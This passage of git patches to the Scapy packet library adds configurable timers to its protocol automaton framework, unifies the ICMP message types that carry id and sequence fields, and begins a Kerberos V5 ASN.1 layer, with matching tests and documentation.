``ATMT.condition`` decorated methods are run by growing prio. Then each time a packet is received and accepted by the master filter all ``ATMT.receive_condition`` decorated hods are called by growing prio. When a timeout is reached since the time we entered into the current space, the corresponding ``ATMT.timeout`` decorated method is called. @@ -834,6 +834,29 @@ Two methods are hooks to be overloaded: * The ``master_filter()`` method is called each time a packet is sniffed and decides if it is interesting for the automaton. When working on a specific protocol, this is where you will ensure the packet belongs to the connection you are being part of, so that you do not need to make all the sanity checks in each transition. +Timer configuration +^^^^^^^^^^^^^^^^^^^ + +Some protocols allow timer configuration. In order to configure timeout values during class initialization one may use ``timer_by_name()`` method, which returns ``Timer`` object associated with the given function name:: + + class Example(Automaton): + def __init__(self, *args, **kwargs): + super(Example, self).__init__(*args, **kwargs) + timer = self.timer_by_name("waiting_timeout") + timer.set(1) + + @ATMT.state(initial=1) + def WAITING(self): + pass + + @ATMT.state(final=1) + def END(self): + pass + + @ATMT.timeout(WAITING, 10.0) + def waiting_timeout(self): + raise self.END() + .. _pipetools: PipeTools diff --git a/scapy/automaton.py b/scapy/automaton.py index a17d73af7c5..549478847fa 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -258,6 +258,124 @@ def __repr__(self): if not k.startswith("_")) +class Timer(): + def __init__(self, time, prio=0, autoreload=False): + # type: (Union[int, float], int, bool) -> None + self._timeout = float(time) # type: float + self._time = 0 # type: float + self._just_expired = True + self._expired = True + self._prio = prio + self._func = _StateWrapper() + self._autoreload = autoreload + + def get(self): + # type: () -> float + return self._timeout + + def set(self, val): + # type: (float) -> None + self._timeout = val + + def _reset(self): + # type: () -> None + self._time = self._timeout + self._expired = False + self._just_expired = False + + def _reset_just_expired(self): + # type: () -> None + self._just_expired = False + + def _running(self): + # type: () -> bool + return self._time > 0 + + def _remaining(self): + # type: () -> float + return max(self._time, 0) + + def _decrement(self, time): + # type: (float) -> None + self._time -= time + if self._time <= 0: + if not self._expired: + self._just_expired = True + if self._autoreload: + # take overshoot into account + self._time = self._timeout + self._time + else: + self._expired = True + self._time = 0 + + def __lt__(self, obj): + # type: (Timer) -> bool + return ((self._time < obj._time) if self._time != obj._time + else (self._prio < obj._prio)) + + def __gt__(self, obj): + # type: (Timer) -> bool + return ((self._time > obj._time) if self._time != obj._time + else (self._prio > obj._prio)) + + def __eq__(self, obj): + # type: (Any) -> bool + if not isinstance(obj, Timer): + raise NotImplementedError() + return (self._time == obj._time) and (self._prio == obj._prio) + + def __repr__(self): + # type: () -> str + return "" % (self._time, self._timeout) + + +class _TimerList(): + def __init__(self): + # type: () -> None + self.timers = [] # type: list[Timer] + + def add_timer(self, timer): + # type: (Timer) -> None + self.timers.append(timer) + + def reset(self): + # type: () -> None + for t in self.timers: + t._reset() + + def decrement(self, time): + # type: (float) -> None + for t in self.timers: + t._decrement(time) + + def expired(self): + # type: () -> list[Timer] + lst = [t for t in self.timers if t._just_expired] + lst.sort(key=lambda x: x._prio, reverse=True) + for t in lst: + t._reset_just_expired() + return lst + + def until_next(self): + # type: () -> float + try: + return min([t._remaining() for t in self.timers if t._running()]) + except ValueError: + return 0 + + def count(self): + # type: () -> int + return len(self.timers) + + def __iter__(self): + # type: () -> Iterator[Timer] + return self.timers.__iter__() + + def __repr__(self): + # type: () -> str + return self.timers.__repr__() + + class _instance_state: def __init__(self, instance): # type: (Any) -> None @@ -307,7 +425,7 @@ class _StateWrapper: atmt_as_supersocket = None # type: Optional[str] atmt_condname = None # type: str atmt_ioname = None # type: str - atmt_timeout = None # type: int + atmt_timeout = None # type: Timer atmt_cond = None # type: Dict[str, int] __code__ = None # type: types.CodeType __call__ = None # type: Callable[..., ATMT.NewStateRequested] @@ -438,12 +556,26 @@ def deco(f, state=state): @staticmethod def timeout(state, timeout): - # type: (_StateWrapper, int) -> Callable[[_StateWrapper, _StateWrapper, int], _StateWrapper] # noqa: E501 - def deco(f, state=state, timeout=timeout): - # type: (_StateWrapper, _StateWrapper, int) -> _StateWrapper + # type: (_StateWrapper, Union[int, float]) -> Callable[[_StateWrapper, _StateWrapper, Timer], _StateWrapper] # noqa: E501 + def deco(f, state=state, timeout=Timer(timeout)): + # type: (_StateWrapper, _StateWrapper, Timer) -> _StateWrapper + f.atmt_type = ATMT.TIMEOUT + f.atmt_state = state.atmt_state + f.atmt_timeout = timeout + f.atmt_timeout._func = f + f.atmt_condname = f.__name__ + return f + return deco + + @staticmethod + def timer(state, timeout, prio=0): + # type: (_StateWrapper, Union[float, int], int) -> Callable[[_StateWrapper, _StateWrapper, Timer], _StateWrapper] # noqa: E501 + def deco(f, state=state, timeout=Timer(timeout, prio=prio, autoreload=True)): # noqa: E501 + # type: (_StateWrapper, _StateWrapper, Timer) -> _StateWrapper f.atmt_type = ATMT.TIMEOUT f.atmt_state = state.atmt_state f.atmt_timeout = timeout + f.atmt_timeout._func = f f.atmt_condname = f.__name__ return f return deco @@ -542,7 +674,7 @@ def __new__(cls, name, bases, dct): cls.recv_conditions = {} # type: Dict[str, List[_StateWrapper]] cls.conditions = {} # type: Dict[str, List[_StateWrapper]] cls.ioevents = {} # type: Dict[str, List[_StateWrapper]] - cls.timeout = {} # type: Dict[str, List[Tuple[int, _StateWrapper]]] # noqa: E501 + cls.timeout = {} # type: Dict[str, _TimerList] cls.actions = {} # type: Dict[str, List[_StateWrapper]] cls.initial_states = [] # type: List[_StateWrapper] cls.stop_states = [] # type: List[_StateWrapper] @@ -568,7 +700,7 @@ def __new__(cls, name, bases, dct): cls.recv_conditions[s] = [] cls.ioevents[s] = [] cls.conditions[s] = [] - cls.timeout[s] = [] + cls.timeout[s] = _TimerList() if m.atmt_initial: cls.initial_states.append(m) if m.atmt_stop: @@ -587,14 +719,11 @@ def __new__(cls, name, bases, dct): if m.atmt_as_supersocket is not None: cls.iosupersockets.append(m) elif m.atmt_type == ATMT.TIMEOUT: - cls.timeout[m.atmt_state].append((m.atmt_timeout, m)) + cls.timeout[m.atmt_state].add_timer(m.atmt_timeout) elif m.atmt_type == ATMT.ACTION: for co in m.atmt_cond: cls.actions[co].append(m) - for v in six.itervalues(cls.timeout): - v.sort(key=lambda x: x[0]) - v.append((None, None)) for v in itertools.chain(six.itervalues(cls.conditions), six.itervalues(cls.recv_conditions), six.itervalues(cls.ioevents)): @@ -649,14 +778,14 @@ def build_graph(self): for x in self.actions[f.atmt_condname]: line += "\\l>[%s]" % x.__name__ s += '\t"%s" -> "%s" [label="%s", color=%s];\n' % (k, n, line, c) # noqa: E501 - for k, v2 in six.iteritems(self.timeout): - for t, f in v2: - if f is None: - continue - for n in f.__code__.co_names + f.__code__.co_consts: + for k, timers in six.iteritems(self.timeout): + for timer in timers: + for n in (timer._func.__code__.co_names + + timer._func.__code__.co_consts): if n in self.states: - line = "%s/%.1fs" % (f.atmt_condname, t) - for x in self.actions[f.atmt_condname]: + line = "%s/%.1fs" % (timer._func.atmt_condname, + timer.get()) + for x in self.actions[timer._func.atmt_condname]: line += "\\l>[%s]" % x.__name__ s += '\t"%s" -> "%s" [label="%s",color=blue];\n' % (k, n, line) # noqa: E501 s += "}\n" @@ -675,7 +804,7 @@ class Automaton: recv_conditions = {} # type: Dict[str, List[_StateWrapper]] conditions = {} # type: Dict[str, List[_StateWrapper]] ioevents = {} # type: Dict[str, List[_StateWrapper]] - timeout = {} # type: Dict[str, List[Tuple[int, _StateWrapper]]] # noqa: E501 + timeout = {} # type: Dict[str, _TimerList] actions = {} # type: Dict[str, List[_StateWrapper]] initial_states = [] # type: List[_StateWrapper] stop_states = [] # type: List[_StateWrapper] @@ -748,6 +877,14 @@ def my_send(self, pkt): # type: (Packet) -> None self.send_sock.send(pkt) + def timer_by_name(self, name): + # type: (str) -> Optional[Timer] + for _, timers in six.iteritems(self.timeout): + for timer in timers: # type: Timer + if timer._func.atmt_condname == name: + return timer + return None + # Utility classes and exceptions class _IO_fdwrapper: def __init__(self, @@ -1031,6 +1168,7 @@ def _do_iter(self): elif not isinstance(state_output, list): state_output = state_output, + timers = self.timeout[self.state.state] # If there are commandMessage, we should skip immediate # conditions. if not select_objects([self.cmdin], 0): @@ -1041,15 +1179,14 @@ def _do_iter(self): # If still there and no conditions left, we are stuck! if (len(self.recv_conditions[self.state.state]) == 0 and len(self.ioevents[self.state.state]) == 0 and - len(self.timeout[self.state.state]) == 1): + timers.count() == 0): raise self.Stuck("stuck in [%s]" % self.state.state, state=self.state.state, result=state_output) # Finally listen and pay attention to timeouts - expirations = iter(self.timeout[self.state.state]) - next_timeout, timeout_func = next(expirations) - t0 = time.time() + timers.reset() + time_previous = time.time() fds = [self.cmdin] if len(self.recv_conditions[self.state.state]) > 0: @@ -1057,15 +1194,12 @@ def _do_iter(self): for ioev in self.ioevents[self.state.state]: fds.append(self.ioin[ioev.atmt_ioname]) while True: - t = time.time() - t0 - if next_timeout is not None: - if next_timeout <= t: - self._run_condition(timeout_func, *state_output) - next_timeout, timeout_func = next(expirations) - if next_timeout is None: - remain = 0 - else: - remain = next_timeout - t + time_current = time.time() + timers.decrement(time_current - time_previous) + time_previous = time_current + for timer in timers.expired(): + self._run_condition(timer._func, *state_output) + remain = timers.until_next() self.debug(5, "Select on %r" % fds) r = select_objects(fds, remain) diff --git a/test/scapy/automaton.uts b/test/scapy/automaton.uts index d2feaf7faa7..2f6dbdf140f 100644 --- a/test/scapy/automaton.uts +++ b/test/scapy/automaton.uts @@ -352,19 +352,92 @@ r = x r assert(r == "Venus") += Automaton timer function +~ run timers + +class TimerTest(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + self.count1 = 0 + self.count2 = 0 + @ATMT.timer(BEGIN, 0.1) + def count1(self): + self.count1 += 1 + @ATMT.timer(BEGIN, 0.15) + def count2(self): + self.count2 += 1 + @ATMT.timeout(BEGIN, 1) + def goto_end(self): + raise self.END() + @ATMT.state(final=1) + def END(self): + pass + +sm = TimerTest(ll=lambda: None, recvsock=lambda: None) +sm.run() + +assert sm.timer_by_name("count0") is None +assert sm.timer_by_name("count1") is not None +assert sm.timer_by_name("count1")._timeout == 0.1 +assert sm.timer_by_name("count2") is not None +assert sm.timer_by_name("count2")._timeout == 0.15 +assert sm.timer_by_name("goto_end") is not None +assert sm.timer_by_name("goto_end")._timeout == 1 +assert sm.count1 == 10 +assert sm.count2 == 6 + +~ reconfigure timers + +sm = TimerTest(ll=lambda: None, recvsock=lambda: None) +sm.timer_by_name("count1").set(0.2) +sm.timer_by_name("count2").set(0.25) +sm.run() +assert sm.count1 == 5 +assert sm.count2 == 4 + +~ timeout + +class TimerTest(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + self.count1 = 0 + self.count2 = 0 + @ATMT.timeout(BEGIN, 0.1) + def count1(self): + self.count1 += 1 + @ATMT.timer(BEGIN, 0.15) + def count2(self): + self.count2 += 1 + @ATMT.timeout(BEGIN, 1) + def goto_end(self): + raise self.END() + @ATMT.state(final=1) + def END(self): + pass + +sm = TimerTest(ll=lambda: None, recvsock=lambda: None) +sm.run() + +assert sm.count1 == 1 +assert sm.count2 == 6 + = Automaton graph ~ automaton class HelloWorld(Automaton): @ATMT.state(initial=1) def BEGIN(self): - pass - @ATMT.condition(BEGIN) - def wait_for_nothing(self): + self.count1 = 0 + self.count2 = 0 + @ATMT.timer(BEGIN, 0.1) + def count1(self): + self.count1 += 1 + @ATMT.timer(BEGIN, 0.15) + def count2(self): + self.count2 += 1 + @ATMT.timeout(BEGIN, 1) + def goto_end(self): raise self.END() - @ATMT.action(wait_for_nothing) - def on_nothing(self): - pass @ATMT.state(final=1) def END(self): pass From 39659b7f588c08ae52e8d05cd4589e4a9af8b168 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 24 Jun 2022 11:42:54 +0200 Subject: [PATCH 0823/1632] Make ICMP types with ID & SEQ fiels consistent (#3449) * Make ICMP types with ID & SEQ fiels consistent * Add test Co-authored-by: gpotter2 --- scapy/layers/inet.py | 9 ++++++--- test/scapy/layers/inet.uts | 4 ++++ 2 files changed, 10 insertions(+), 3 deletions(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 03cf470f043..d1a4588ed9a 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -950,13 +950,16 @@ def mysummary(self): 5: "need-authorization", }, } +icmp_id_seq_types = [0, 8, 13, 14, 15, 16, 17, 18, 37, 38] + + class ICMP(Packet): name = "ICMP" fields_desc = [ByteEnumField("type", 8, icmptypes), MultiEnumField("code", 0, icmpcodes, depends_on=lambda pkt:pkt.type, fmt="B"), # noqa: E501 XShortField("chksum", None), - ConditionalField(XShortField("id", 0), lambda pkt:pkt.type in [0, 8, 13, 14, 15, 16, 17, 18]), # noqa: E501 - ConditionalField(XShortField("seq", 0), lambda pkt:pkt.type in [0, 8, 13, 14, 15, 16, 17, 18]), # noqa: E501 + ConditionalField(XShortField("id", 0), lambda pkt:pkt.type in icmp_id_seq_types), # noqa: E501 + ConditionalField(XShortField("seq", 0), lambda pkt:pkt.type in icmp_id_seq_types), # noqa: E501 ConditionalField(ICMPTimeStampField("ts_ori", None), lambda pkt:pkt.type in [13, 14]), # noqa: E501 ConditionalField(ICMPTimeStampField("ts_rx", None), lambda pkt:pkt.type in [13, 14]), # noqa: E501 ConditionalField(ICMPTimeStampField("ts_tx", None), lambda pkt:pkt.type in [13, 14]), # noqa: E501 @@ -985,7 +988,7 @@ def post_build(self, p, pay): return p def hashret(self): - if self.type in [0, 8, 13, 14, 15, 16, 17, 18, 33, 34, 35, 36, 37, 38]: + if self.type in icmp_id_seq_types: return struct.pack("HH", self.id, self.seq) + self.payload.hashret() # noqa: E501 return self.payload.hashret() diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 349866a674e..45455e0a681 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -519,6 +519,10 @@ assert(len(l) == 6) assert([len(raw(p[IP].payload)) for p in l] == [8, 8, 8, 8, 8, 8]) assert([(p.frag, p.flags.MF) for p in [IP(raw(p)) for p in l]] == [(0, True), (1, True), (2, True), (0, True), (1, True), (2, False)]) += IPv4 - ICMP hashret +for x in ICMP(type=range(0,40),code=range(0,40)): + (IP()/x).hashret() + = IPv4 - traceroute utilities ip_ttl = [("192.168.0.%d" % i, i) for i in six.moves.range(1, 10)] From f464d1333e91c23ced71174d2cb564f01f464bc8 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 24 Jun 2022 12:05:33 +0200 Subject: [PATCH 0824/1632] Add basic Kerberos (#3657) --- scapy/asn1/asn1.py | 5 + scapy/asn1/ber.py | 17 +- scapy/asn1fields.py | 54 +++-- scapy/config.py | 2 + scapy/layers/kerberos.py | 398 +++++++++++++++++++++++++++++++++ test/regression.uts | 8 +- test/scapy/layers/kerberos.uts | 65 ++++++ 7 files changed, 525 insertions(+), 24 deletions(-) create mode 100644 scapy/layers/kerberos.py create mode 100644 test/scapy/layers/kerberos.uts diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index c9b52e89cf0..77777265a36 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -45,6 +45,7 @@ # Python 2 compat - don't bother typing it class UTC(tzinfo): """UTC""" + def utcoffset(self, dt): # type: ignore return timedelta(0) @@ -564,6 +565,10 @@ class ASN1_IA5_STRING(ASN1_STRING): tag = ASN1_Class_UNIVERSAL.IA5_STRING +class ASN1_GENERAL_STRING(ASN1_STRING): + tag = ASN1_Class_UNIVERSAL.GENERAL_STRING + + class ASN1_GENERALIZED_TIME(ASN1_STRING): """ Improved version of ASN1_GENERALIZED_TIME, properly handling time zones and diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index cd20d098afb..ef5e9e01ead 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -220,6 +220,7 @@ def BER_tagging_dec(s, # type: bytes implicit_tag=None, # type: Optional[int] explicit_tag=None, # type: Optional[int] safe=False, # type: Optional[bool] + _fname="", # type: str ): # type: (...) -> Tuple[Optional[int], bytes] # We output the 'real_tag' if it is different from the (im|ex)plicit_tag. @@ -227,14 +228,15 @@ def BER_tagging_dec(s, # type: bytes if len(s) > 0: err_msg = ( "BER_tagging_dec: observed tag 0x%.02x does not " - "match expected tag 0x%.02x" + "match expected tag 0x%.02x (%s)" ) if implicit_tag is not None: ber_id, s = BER_id_dec(s) if ber_id != implicit_tag: if not safe and ber_id & 0x1f != implicit_tag & 0x1f: - raise BER_Decoding_Error(err_msg % (ber_id, implicit_tag), - remaining=s) + raise BER_Decoding_Error(err_msg % ( + ber_id, implicit_tag, _fname), + remaining=s) else: real_tag = ber_id s = chb(hash(hidden_tag)) + s @@ -242,8 +244,9 @@ def BER_tagging_dec(s, # type: bytes ber_id, s = BER_id_dec(s) if ber_id != explicit_tag: if not safe: - raise BER_Decoding_Error(err_msg % (ber_id, explicit_tag), - remaining=s) + raise BER_Decoding_Error( + err_msg % (ber_id, explicit_tag, _fname), + remaining=s) else: real_tag = ber_id l, s = BER_len_dec(s) @@ -595,6 +598,10 @@ class BERcodec_IA5_STRING(BERcodec_STRING): tag = ASN1_Class_UNIVERSAL.IA5_STRING +class BERcodec_GENERAL_STRING(BERcodec_STRING): + tag = ASN1_Class_UNIVERSAL.GENERAL_STRING + + class BERcodec_UTC_TIME(BERcodec_STRING): tag = ASN1_Class_UNIVERSAL.UTC_TIME diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 1950a08922b..1fd4d2f9ce8 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -136,7 +136,8 @@ def m2i(self, pkt, s): diff_tag, s = BER_tagging_dec(s, hidden_tag=self.ASN1_tag, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag, - safe=self.flexible_tag) + safe=self.flexible_tag, + _fname=self.name) if diff_tag is not None: # this implies that flexible_tag was True if self.implicit_tag is not None: @@ -377,6 +378,10 @@ class ASN1F_IA5_STRING(ASN1F_STRING): ASN1_tag = ASN1_Class_UNIVERSAL.IA5_STRING +class ASN1F_GENERAL_STRING(ASN1F_STRING): + ASN1_tag = ASN1_Class_UNIVERSAL.GENERAL_STRING + + class ASN1F_UTC_TIME(ASN1F_STRING): ASN1_tag = ASN1_Class_UNIVERSAL.UTC_TIME @@ -462,7 +467,8 @@ def m2i(self, pkt, s): diff_tag, s = BER_tagging_dec(s, hidden_tag=self.ASN1_tag, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag, - safe=self.flexible_tag) + safe=self.flexible_tag, + _fname=pkt.name) if diff_tag is not None: if self.implicit_tag is not None: self.implicit_tag = diff_tag @@ -499,22 +505,38 @@ class ASN1F_SET(ASN1F_SEQUENCE): ASN1_tag = ASN1_Class_UNIVERSAL.SET -class ASN1F_SEQUENCE_OF(ASN1F_field[List['ASN1_Packet'], - List['ASN1_Packet']]): +_SEQ_T = Union['ASN1_Packet', Type[ASN1F_field], 'ASN1F_PACKET'] + + +class ASN1F_SEQUENCE_OF(ASN1F_field[List[_SEQ_T], + List[ASN1_Object[Any]]]): + """ + Two types are allowed as cls: ASN1_Packet, ASN1F_field + """ ASN1_tag = ASN1_Class_UNIVERSAL.SEQUENCE - holds_packets = 1 islist = 1 def __init__(self, name, # type: str - default, # type: List[ASN1_Packet] - cls, # type: Type[ASN1_Packet] + default, # type: Any + cls, # type: _SEQ_T context=None, # type: Optional[Any] implicit_tag=None, # type: Optional[Any] explicit_tag=None, # type: Optional[Any] ): # type: (...) -> None - self.cls = cls + if isinstance(cls, type) and issubclass(cls, ASN1F_field): + self.fld = cast(Type[ASN1F_field[Any, Any]], cls) + self._extract_packet = lambda s, pkt: self.fld( + self.name, b"").m2i(pkt, s) + self.holds_packets = 0 + elif hasattr(cls, "ASN1_root") or callable(cls): + self.cls = cast("Type[ASN1_Packet]", cls) + self._extract_packet = lambda s, pkt: self.extract_packet( + self.cls, s, _underlayer=pkt) + self.holds_packets = 1 + else: + raise ValueError("cls should be an ASN1_Packet or ASN1_field") super(ASN1F_SEQUENCE_OF, self).__init__( name, None, context=context, implicit_tag=implicit_tag, explicit_tag=explicit_tag @@ -531,7 +553,7 @@ def m2i(self, pkt, # type: ASN1_Packet s, # type: bytes ): - # type: (...) -> Tuple[List[ASN1_Packet], bytes] + # type: (...) -> Tuple[List[Any], bytes] diff_tag, s = BER_tagging_dec(s, hidden_tag=self.ASN1_tag, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag, @@ -545,7 +567,7 @@ def m2i(self, i, s, remain = codec.check_type_check_len(s) lst = [] while s: - c, s = self.extract_packet(self.cls, s, _underlayer=pkt) + c, s = self._extract_packet(s, pkt) # type: ignore if c: lst.append(c) if len(s) > 0: @@ -557,7 +579,7 @@ def build(self, pkt): val = getattr(pkt, self.name) if isinstance(val, ASN1_Object) and \ val.tag == ASN1_Class_UNIVERSAL.RAW: - s = cast(Union[List[ASN1_Packet], bytes], val) + s = cast(Union[List[_SEQ_T], bytes], val) elif val is None: s = b"" else: @@ -565,8 +587,11 @@ def build(self, pkt): return self.i2m(pkt, s) def randval(self): - # type: () -> ASN1_Packet - return packet.fuzz(self.cls()) + # type: () -> Any + if self.holds_packets: + return packet.fuzz(self.cls()) + else: + return self.fld(self.name, b"").randval() def __repr__(self): # type: () -> str @@ -780,7 +805,8 @@ def m2i(self, pkt, s): diff_tag, s = BER_tagging_dec(s, hidden_tag=cls.ASN1_root.ASN1_tag, # noqa: E501 implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag, - safe=self.flexible_tag) + safe=self.flexible_tag, + _fname=self.name) if diff_tag is not None: if self.implicit_tag is not None: self.implicit_tag = diff_tag diff --git a/scapy/config.py b/scapy/config.py index a71c025aa66..225dbca0542 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -827,8 +827,10 @@ class Conf(ConfClass): 'ipsec', 'ir', 'isakmp', + 'kerberos', 'l2', 'l2tp', + 'ldap', 'llmnr', 'lltd', 'mgcp', diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py new file mode 100644 index 00000000000..164a759dfcc --- /dev/null +++ b/scapy/layers/kerberos.py @@ -0,0 +1,398 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Gabriel Potter +# This program is published under a GPLv2 license + +""" +Kerberos V5 + +Implements parts of +- Kerberos Version 5 GSS-API: RFC1964 +""" + +from scapy.asn1.asn1 import ASN1_SEQUENCE, ASN1_Class_UNIVERSAL, ASN1_Codecs +from scapy.asn1.ber import BERcodec_SEQUENCE +from scapy.asn1fields import ( + ASN1F_CHOICE, + ASN1F_FLAGS, + ASN1F_GENERAL_STRING, + ASN1F_GENERALIZED_TIME, + ASN1F_INTEGER, + ASN1F_PACKET, + ASN1F_SEQUENCE, + ASN1F_SEQUENCE_OF, + ASN1F_STRING, + ASN1F_enum_INTEGER, + ASN1F_optional, +) +from scapy.asn1packet import ASN1_Packet +from scapy.packet import bind_bottom_up, bind_layers +from scapy.volatile import GeneralizedTime + +from scapy.layers.inet import UDP + +# kerberos APPLICATION + + +class ASN1_Class_KRB(ASN1_Class_UNIVERSAL): + name = "KERBEROS" + APPLICATION = 0x60 + + +class ASN1_GSSAPI_APPLICATION(ASN1_SEQUENCE): + tag = ASN1_Class_KRB.APPLICATION + + +class BERcodec_GSSAPI_APPLICATION(BERcodec_SEQUENCE): + tag = ASN1_Class_KRB.APPLICATION + + +class ASN1F_KRB_APPLICATION(ASN1F_SEQUENCE): + ASN1_tag = ASN1_Class_KRB.APPLICATION + +# sect 5.2 + + +KerberosString = ASN1F_GENERAL_STRING +Realm = KerberosString +Int32 = ASN1F_INTEGER +UInt32 = ASN1F_INTEGER + + +class PrincipalName(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Int32("nameType", 0, explicit_tag=0xa0), + ASN1F_SEQUENCE_OF( + "nameString", + [], + KerberosString, + explicit_tag=0xa1 + ) + ) + + +KerberosTime = ASN1F_GENERALIZED_TIME +Microseconds = ASN1F_INTEGER + + +class HostAddress(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Int32("addrType", 0, explicit_tag=0xa0), + ASN1F_STRING("address", "", explicit_tag=0xa1) + ) + + +HostAddresses = lambda name, **kwargs: ASN1F_SEQUENCE_OF( + name, + [], + HostAddress, + **kwargs +) + + +class AuthorizationDataItem(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Int32("adType", 0, explicit_tag=0xa0), + ASN1F_STRING("adData", "", explicit_tag=0xa1) + ) + + +AuthorizationData = lambda name, **kwargs: ASN1F_SEQUENCE_OF( + name, + [], + AuthorizationDataItem, + **kwargs +) +ADIFRELEVANT = AuthorizationData +Checksum = lambda **kwargs: ASN1F_SEQUENCE( + Int32("chksumtype", 0, explicit_tag=0xa0), + ASN1F_STRING("checksum", "", explicit_tag=0xa1), + **kwargs +) +ADKDCIssued = ASN1F_SEQUENCE( + Checksum(explicit_tag=0xa0), + ASN1F_optional( + Realm("iRealm", "", explicit_tag=0xa1), + ), + ASN1F_optional( + ASN1F_PACKET("iSname", None, PrincipalName, + explicit_tag=0xa2) + ), + AuthorizationData("elements", explicit_tag=0xa3) +) +ASANDOR = ASN1F_SEQUENCE( + Int32("conditionCount", 0, explicit_tag=0xa1), + AuthorizationData("elements", explicit_tag=0xa1) +) +ADMANDATORYFORKDC = AuthorizationData + + +class PADATA(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Int32("padataType", 0, explicit_tag=0xa1), + ASN1F_STRING("padataValue", "", explicit_tag=0xa2) + ) + + +class EncryptedData(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Int32("etype", 0, explicit_tag=0xa0), + ASN1F_optional( + UInt32("kvno", 0, explicit_tag=0xa1) + ), + ASN1F_STRING("cipher", "", explicit_tag=0xa2) + ) + + +EncryptionKey = ASN1F_SEQUENCE( + Int32("keytype", 0, explicit_tag=0x0), + ASN1F_STRING("keyvalue", "", explicit_tag=0x1), +) +PAENCTIMESTAMP = EncryptedData +KerberosFlags = ASN1F_FLAGS + +# sect 5.10 + +KRB_MSG_TYPES = { + 1: "Ticket", + 2: "Authenticator", + 3: "EncTicketPart", + 10: "AS-REQ", + 11: "AS-REP", + 12: "TGS-REQ", + 13: "TGS-REP", + 14: "AP-REQ", + 20: "KRB-SAFE", + 21: "KRB-PRIV", + 22: "KRB-CRED", + 25: "EncASRepPart", + 26: "EncTGSRepPart", + 27: "EncApRepPart", + 28: "EncKrbPrivPart", + 29: "EnvKrbCredPart", + 30: "KRB-ERROR", +} + +# sect 5.3 + + +class KRB_Ticket(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + ASN1F_SEQUENCE( + ASN1F_INTEGER("tktVno", 0, explicit_tag=0xa0), + Realm("realm", "", explicit_tag=0xa1), + ASN1F_PACKET("sname", None, PrincipalName, + explicit_tag=0xa2), + ASN1F_PACKET("encPart", None, EncryptedData, + explicit_tag=0xa3), + ), + implicit_tag=1 + ) + +# sect 5.4.1 + + +class KRB_KDC_REQ_BODY(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + KerberosFlags("kdcOptions", "", [ + "reserved", + "forwardable", + "forwarded", + "proxiable", + "proxy", + "allow-postdate", + "postdated", + "unused7", + "renewable", + "unused9", + "unused10", + "opt-hardware-auth", + "unused12", + "unused13", + "constrained-delegation", + "canonicalize", + "request-anonymous", + ] + ["unused%d" % i for i in range(17, 26)] + [ + "disable-transited-check", + "renewable-ok", + "enc-tkt-in-skey", + "unused29", + "renew", + "validate" + ], + explicit_tag=0xa0), + ASN1F_optional( + ASN1F_PACKET("cname", None, PrincipalName, + explicit_tag=0xa1) + ), + Realm("realm", "", explicit_tag=0xa2), + ASN1F_optional( + ASN1F_PACKET("sname", None, PrincipalName, + explicit_tag=0xa3), + ), + ASN1F_optional( + KerberosTime("from", GeneralizedTime(), explicit_tag=0xa4) + ), + KerberosTime("till", GeneralizedTime(), explicit_tag=0xa5), + ASN1F_optional( + KerberosTime("rtime", GeneralizedTime(), explicit_tag=0xa6) + ), + UInt32("nonce", 0, explicit_tag=0xa7), + ASN1F_SEQUENCE_OF( + "etype", + [], + Int32, + explicit_tag=0xa8 + ), + ASN1F_optional( + HostAddresses("addresses", explicit_tag=0xa9), + ), + ASN1F_optional( + ASN1F_PACKET("encAuthorizationData", None, EncryptedData, + explicit_tag=0xaa), + ), + ASN1F_optional( + ASN1F_SEQUENCE_OF( + "additionalTickets", + [], + KRB_Ticket, + explicit_tag=0xab + ) + ) + ) + + +KRB_KDC_REQ = ASN1F_SEQUENCE( + ASN1F_INTEGER("pvno", 5, explicit_tag=0xa1), + ASN1F_enum_INTEGER("msgType", 10, KRB_MSG_TYPES, + explicit_tag=0xa2), + ASN1F_optional( + ASN1F_SEQUENCE_OF("padata", [], PADATA, + explicit_tag=0xa3) + ), + ASN1F_PACKET("reqBody", + KRB_KDC_REQ_BODY(), + KRB_KDC_REQ_BODY, + explicit_tag=0xa4) +) + + +class KRB_AS_REQ(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + KRB_KDC_REQ, + implicit_tag=10, + ) + + +class KRB_TGS_REQ(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + KRB_KDC_REQ, + implicit_tag=12, + ) + + +# sect 5.4.2 + +KRB_KDC_REP = ASN1F_SEQUENCE( + 